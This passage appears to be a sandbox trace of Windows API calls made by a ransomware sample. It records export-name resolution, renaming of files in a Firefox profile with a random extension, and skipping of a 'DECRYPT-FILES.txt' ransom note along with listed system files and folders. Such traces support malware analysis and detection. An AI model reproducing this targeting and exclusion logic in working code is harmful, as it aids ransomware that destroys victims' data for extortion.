returned 18 [0080.583] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0080.583] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0080.583] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0080.583] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0080.583] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0080.583] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0080.583] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0080.583] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0080.583] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0080.583] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0080.583] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0080.583] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0080.583] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0080.583] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0080.583] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0080.583] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0080.583] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0080.583] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0080.583] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0080.583] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0080.583] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0080.583] lstrlenA (lpString="CTRLROUTINE") returned 11 [0080.583] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0080.583] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0080.583] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0080.583] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0080.583] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0080.583] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0080.583] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0080.583] lstrlenA (lpString="DEBUGBREAK") returned 10 [0080.583] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0080.583] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0080.583] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0080.584] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0080.584] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0080.584] lstrlenA (lpString="DECODEPOINTER") returned 13 [0080.584] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0080.584] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0080.584] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0080.584] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0080.584] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0080.584] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0080.584] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0080.584] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0080.584] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0080.584] lstrlenA (lpString="DELETEATOM") returned 10 [0080.584] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0080.584] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0080.584] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0080.584] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0080.584] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0080.584] lstrlenA (lpString="DELETEFIBER") returned 11 [0080.584] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0080.584] lstrlenA (lpString="DELETEFILEA") returned 11 [0080.584] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0080.584] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0080.584] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0080.584] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0080.584] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0080.584] lstrlenA (lpString="DELETEFILEW") returned 11 [0080.584] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0080.584] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0080.584] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0080.584] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0080.584] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0080.584] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0080.584] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0080.584] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0080.585] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0080.585] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0080.585] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0080.585] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0080.585] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0080.585] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0080.585] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0080.585] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0080.585] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0080.585] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0080.585] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0080.585] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0080.585] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0080.585] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0080.585] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0080.585] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0080.585] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0080.585] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0080.585] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0080.585] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0080.585] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0080.585] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0080.585] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0080.585] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0080.585] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0080.585] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0080.585] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0080.585] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0080.585] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0080.585] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0080.585] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0080.585] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0080.585] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0080.585] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0080.585] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0080.585] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0080.586] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0080.586] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0080.586] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0080.586] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0080.586] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0080.586] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0080.586] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0080.586] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0080.586] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0080.586] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0080.586] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0080.586] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0080.586] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0080.586] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0080.586] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0080.586] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0080.586] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0080.586] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0080.586] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0080.586] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0080.586] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0080.586] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0080.586] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0080.587] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0080.587] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332") returned 101 [0080.587] wsprintfW (in: param_1=0x3f2d730, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332.XEV9dX") returned 108 [0080.587] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332.XEV9dX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332.xev9dx"), dwFlags=0x0) returned 1 [0080.587] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.588] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.588] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.588] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac3706e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac3706e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac3706e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0080.588] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0080.588] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0080.588] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0080.588] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0080.588] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0080.588] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0080.588] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0080.588] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0080.588] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0080.588] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0080.588] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.588] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0080.588] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0080.588] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0080.588] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0080.588] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\") returned 76 [0080.588] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.588] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\" [0080.589] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\jkbimi8.tmp" [0080.589] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.589] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0080.589] CloseHandle (hObject=0x0) returned 0 [0080.589] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.589] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac3706e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac3706e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac3706e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0080.589] FindClose (in: hFindFile=0x5f8d18 | out: hFindFile=0x5f8d18) returned 1 [0080.589] CloseHandle (hObject=0x450) returned 1 [0080.589] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac3706e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac3706e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac3706e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0080.589] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0080.589] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac3706e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac3706e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac3706e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0080.589] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0080.589] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0080.590] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0080.590] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0080.590] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0080.590] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0080.590] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0080.590] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0080.590] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0080.590] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0080.590] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.590] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0080.590] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0080.590] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0080.590] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0080.590] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0080.590] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.590] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" [0080.590] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\jkbimi8.tmp" [0080.590] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.590] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0080.590] CloseHandle (hObject=0x0) returned 0 [0080.590] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.591] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Profiles", cAlternateFileName="")) returned 1 [0080.591] lstrcmpW (lpString1="Profiles", lpString2=".") returned 1 [0080.591] lstrcmpW (lpString1="Profiles", lpString2="..") returned 1 [0080.591] lstrcatW (in: lpString1="Profiles", lpString2="\\" | out: lpString1="Profiles\\") returned="Profiles\\" [0080.591] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="Profiles\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" [0080.591] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpSrch="\\Program Files") returned 0x0 [0080.591] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpSrch=":\\Windows") returned 0x0 [0080.591] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpSrch="\\Games\\") returned 0x0 [0080.591] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpSrch="\\Tor Browser\\") returned 0x0 [0080.591] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpSrch="\\ProgramData\\") returned 0x0 [0080.591] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0080.591] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0080.591] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0080.591] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpSrch="\\All Users") returned 0x0 [0080.591] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpSrch="\\IETldCache\\") returned 0x0 [0080.591] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpSrch="\\Local Settings\\") returned 0x0 [0080.591] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS 